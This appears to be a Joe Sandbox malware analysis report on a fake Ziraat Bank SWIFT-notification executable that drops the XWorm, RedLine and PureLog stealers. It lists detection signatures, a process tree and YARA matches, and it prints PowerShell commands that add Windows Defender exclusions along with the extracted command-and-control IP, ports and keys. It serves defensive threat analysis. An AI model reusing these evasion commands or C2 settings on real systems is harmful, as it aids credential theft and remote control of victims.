Edit tour

Windows Analysis Report
Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Overview

General Information

Sample name:	Ziraat_Bankasi_Swift-Messaji_Notifications.exe
Analysis ID:	1645186
MD5:	cddaeb64c402c6127545f151590c5d20
SHA1:	f62cfcc6347fdfdbe503daaa6b7cdee1ccb1d0ed
SHA256:	8e8b85ca1b4d5b6d629c758ec683a2530e54fc57e51d273e07e5d4f6f016dc72
Tags:	exegeoRedLineStealerTURZiraatBankuser-abuse_ch
Infos:

Detection

PureLog Stealer, RedLine, XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected XWorm

Adds a directory exclusion to Windows Defender

Binary is likely a compiled AutoIt script file

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Contains functionality to behave differently if execute on a Russian/Kazak computer

Creates files in the system32 config directory

Drops VBS files to the startup folder

Drops executable to a common third party application directory

Found direct / indirect Syscall (likely to bypass EDR)

Infects executable files (exe, dll, sys, html)

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Queries random domain names (often used to prevent blacklisting and sinkholes)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes data at the end of the disk (often used by bootkits to hide malicious code)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Connects to many different domains

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Enables driver privileges

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

Ziraat_Bankasi_Swift-Messaji_Notifications.exe (PID: 6912 cmdline: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe" MD5: CDDAEB64C402C6127545F151590C5D20)

niellist.exe (PID: 5580 cmdline: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe" MD5: CDDAEB64C402C6127545F151590C5D20)

RegSvcs.exe (PID: 7196 cmdline: "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

build.exe (PID: 7280 cmdline: "C:\Users\user\AppData\Local\Temp\build.exe" MD5: 209B15FADE618AF5831E6E2528A4FEDC)

XClient.exe (PID: 7304 cmdline: "C:\Users\user\AppData\Local\Temp\XClient.exe" MD5: F298510C3C663FE4EE5DFB82EA0F6E7E)

powershell.exe (PID: 7464 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7952 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 436 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

armsvc.exe (PID: 6160 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: DB3D683A99099145FD94372A1AA172E5)

alg.exe (PID: 6308 cmdline: C:\Windows\System32\alg.exe MD5: 26A2709C458EDA73B161FD3116804164)

elevation_service.exe (PID: 7348 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe" MD5: 3A316A63C5212BE267DF086616EF54CE)

maintenanceservice.exe (PID: 7400 cmdline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" MD5: F6CBA90116D90851BDB689A7A7EB26D4)

wscript.exe (PID: 7612 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

niellist.exe (PID: 7664 cmdline: "C:\Users\user\AppData\Local\differences\niellist.exe" MD5: CDDAEB64C402C6127545F151590C5D20)

RegSvcs.exe (PID: 7800 cmdline: "C:\Users\user\AppData\Local\differences\niellist.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

XClient.exe (PID: 6684 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: F298510C3C663FE4EE5DFB82EA0F6E7E)

XClient.exe (PID: 2956 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: F298510C3C663FE4EE5DFB82EA0F6E7E)

FXSSVC.exe (PID: 7760 cmdline: C:\Windows\system32\fxssvc.exe MD5: D354A0CCFC1E8DAE893E165E53774A2A)

msdtc.exe (PID: 7964 cmdline: C:\Windows\System32\msdtc.exe MD5: 97DFDF69D7CFCCDE09CE5329EC6EE79F)

PerceptionSimulationService.exe (PID: 7136 cmdline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe MD5: 68A348DD97C11B5456E2D926D5FF84E2)

perfhost.exe (PID: 5840 cmdline: C:\Windows\SysWow64\perfhost.exe MD5: 76EE48EB4F3DC6CB0842161E80130CB0)

Locator.exe (PID: 8044 cmdline: C:\Windows\system32\locator.exe MD5: 608D967442DF942E49892181216CBF82)

SensorDataService.exe (PID: 8096 cmdline: C:\Windows\System32\SensorDataService.exe MD5: F3F23BC9C602B94E53D5EC191015578E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://cyber.wtf/2025/02/12/unpacking-pyarmor-v8-scripts/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["204.10.161.147"], "Port": 7081, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: RedLine

{"C2 url": ["204.10.161.147:7082"], "Bot Id": "success", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\XClient.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Local\Temp\XClient.exe	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x68dd:$str01: $VB$Local_Port 0x68ce:$str02: $VB$Local_Host 0x6b53:$str03: get_Jpeg 0x65b6:$str04: get_ServicePack 0x76ea:$str05: Select * from AntivirusProduct 0x78e8:$str06: PCRestart 0x78fc:$str07: shutdown.exe /f /r /t 0 0x79ae:$str08: StopReport 0x7984:$str09: StopDDos 0x7a7a:$str10: sendPlugin 0x7bfa:$str12: -ExecutionPolicy Bypass -File " 0x7d23:$str13: Content-length: 5235
C:\Users\user\AppData\Local\Temp\XClient.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7f90:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x802d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8142:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7c3e:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Roaming\XClient.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x68dd:$str01: $VB$Local_Port 0x68ce:$str02: $VB$Local_Host 0x6b53:$str03: get_Jpeg 0x65b6:$str04: get_ServicePack 0x76ea:$str05: Select * from AntivirusProduct 0x78e8:$str06: PCRestart 0x78fc:$str07: shutdown.exe /f /r /t 0 0x79ae:$str08: StopReport 0x7984:$str09: StopDDos 0x7a7a:$str10: sendPlugin 0x7bfa:$str12: -ExecutionPolicy Bypass -File " 0x7d23:$str13: Content-length: 5235
C:\Users\user\AppData\Roaming\XClient.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7f90:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x802d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8142:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7c3e:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\build.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\build.exe	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x24cc3:$gen01: ChromeGetRoamingName 0x24ce8:$gen02: ChromeGetLocalName 0x24d2b:$gen03: get_UserDomainName 0x28bc4:$gen04: get_encrypted_key 0x27943:$gen05: browserPaths 0x27c19:$gen06: GetBrowsers 0x27501:$gen07: get_InstalledInputLanguages 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\ 0x296c6:$spe9: wallet 0x219ea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0x21f14:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0x21fc1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0x21998:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0x219c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0x21b92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0x21de5:$typ11: 2A19BFD7333718195216588A698752C517111B02 0x220d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.1311146517.0000000003D95000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.1304482234.0000000000400000.00000040.80000000.00040000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 FA 88 44 24 2B 88 44 24 2F B0 D4 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000011.00000002.1415424973.0000000004D10000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 FA 88 44 24 2B 88 44 24 2F B0 D4 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000009.00000002.1307610428.0000000002A20000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.1311146517.0000000003E63000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.1302912222.0000000004000000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 FA 88 44 24 2B 88 44 24 2F B0 D4 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000009.00000002.1311146517.0000000003F3C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000002.1312948986.0000000005390000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.1311146517.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000002.1312584918.0000000005300000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000009.00000002.1308147136.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x5d084:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x666c8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6fd24:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5d121:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x66765:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6fdc1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5d236:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6687a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6fed6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5cd32:$cnc4: POST / HTTP/1.1 0x66376:$cnc4: POST / HTTP/1.1 0x6f9d2:$cnc4: POST / HTTP/1.1
0000000A.00000000.1301567190.0000000000EF2000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000B.00000000.1302946369.0000000000CF2000.00000002.00000001.01000000.00000009.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7d90:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7e2d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7f42:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7a3e:$cnc4: POST / HTTP/1.1
Process Memory Space: RegSvcs.exe PID: 7196	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: RegSvcs.exe PID: 7196	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 7196	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: build.exe PID: 7280	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: XClient.exe PID: 7304	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: RegSvcs.exe PID: 7800	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.RegSvcs.exe.2e60d94.4.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
9.2.RegSvcs.exe.2e60d94.4.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x4add:$str01: $VB$Local_Port 0x4ace:$str02: $VB$Local_Host 0x4d53:$str03: get_Jpeg 0x47b6:$str04: get_ServicePack 0x58ea:$str05: Select * from AntivirusProduct 0x5ae8:$str06: PCRestart 0x5afc:$str07: shutdown.exe /f /r /t 0 0x5bae:$str08: StopReport 0x5b84:$str09: StopDDos 0x5c7a:$str10: sendPlugin 0x5dfa:$str12: -ExecutionPolicy Bypass -File " 0x5f23:$str13: Content-length: 5235
9.2.RegSvcs.exe.2e60d94.4.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6190:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x622d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6342:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5e3e:$cnc4: POST / HTTP/1.1
3.2.niellist.exe.4000000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 FA 88 44 24 2B 88 44 24 2F B0 D4 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
9.2.RegSvcs.exe.3d96458.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
17.2.niellist.exe.4d10000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 FA 88 44 24 2B 88 44 24 2F B0 D4 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
9.2.RegSvcs.exe.5390000.13.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.5300000.12.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.5390000.13.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.3d95570.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.5300ee8.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.RegSvcs.exe.2e57738.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
9.2.RegSvcs.exe.2e57738.2.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x68dd:$str01: $VB$Local_Port 0xff39:$str01: $VB$Local_Port 0x68ce:$str02: $VB$Local_Host 0xff2a:$str02: $VB$Local_Host 0x6b53:$str03: get_Jpeg 0x101af:$str03: get_Jpeg 0x65b6:$str04: get_ServicePack 0xfc12:$str04: get_ServicePack 0x76ea:$str05: Select * from AntivirusProduct 0x10d46:$str05: Select * from AntivirusProduct 0x78e8:$str06: PCRestart 0x10f44:$str06: PCRestart 0x78fc:$str07: shutdown.exe /f /r /t 0 0x10f58:$str07: shutdown.exe /f /r /t 0 0x79ae:$str08: StopReport 0x1100a:$str08: StopReport 0x7984:$str09: StopDDos 0x10fe0:$str09: StopDDos 0x7a7a:$str10: sendPlugin 0x110d6:$str10: sendPlugin 0x7bfa:$str12: -ExecutionPolicy Bypass -File "
